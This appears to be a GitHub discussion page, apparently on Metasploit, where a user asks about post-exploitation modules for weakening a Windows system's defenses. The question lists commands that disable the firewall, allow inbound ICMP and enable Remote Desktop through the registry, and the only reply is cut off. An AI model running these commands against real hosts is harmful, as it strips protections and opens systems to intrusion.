Is there any post exploitation modules that can loosen the defense of the system #16243
              
                Unanswered
              
          
                  
                    
                      flamecopper
                    
                  
                
                  asked this question in
                General
              
            Replies: 1 comment 1 reply
-
| 
         In short,  | 
  
Beta Was this translation helpful? Give feedback.
                  
                    1 reply
                  
                
            
  
    Sign up for free
    to join this conversation on GitHub.
    Already have an account?
    Sign in to comment
  
        
    
Uh oh!
There was an error while loading. Please reload this page.
-
For example,
I am using the following, is there any of the same in metasploit?
netsh firewall set opmode disable
netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Beta Was this translation helpful? Give feedback.
All reactions